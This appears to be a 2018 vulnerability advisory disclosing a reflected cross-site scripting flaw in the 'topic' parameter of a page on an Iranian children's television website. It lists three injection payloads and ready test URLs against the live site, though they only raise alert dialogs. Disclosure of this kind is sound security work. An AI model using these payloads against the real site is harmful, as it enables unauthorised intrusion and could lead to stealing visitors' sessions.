Hodhodfarsi.tv - Cross-site scripting (XSS)

2018.11.14
ir kodak (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Hodhodfarsi.tv - Cross-site scripting (XSS) # Exploit Author: kodak # Date: 2018-11-14 # Vendor Homepage: http://www.hodhodfarsi.tv/ # Category : webapps # Tested on: Windows and Linux # CVE: CWE-79 1. Description: ==================== Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. *** Hod hod farsi is a iranian television channel for children and teenagers *** 2. Exploit/POC: ==================== Vulnerable file : http://hodhodfarsi.tv/video.php Parameter: topic (GET) Vulenrability : Reflected XSS Location : /video.php Payloads : topic=1"><script>alert("Kodak")</script> Or topic=1"/><svg/onload=prompt("Beh")> Or topic=1"><iframe/src=javascript:confirm("PRDS")>IR Testing: http://hodhodfarsi.tv/video.php?topic=1"><script>alert("XSS")</script> http://hodhodfarsi.tv/video.php?topic=1"/><svg/onload=prompt("XSS")> 3. Screenshot ==================== https://imgur.com/a/AHxGtqF ------------------------------- #Thanks to PARDIS:)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top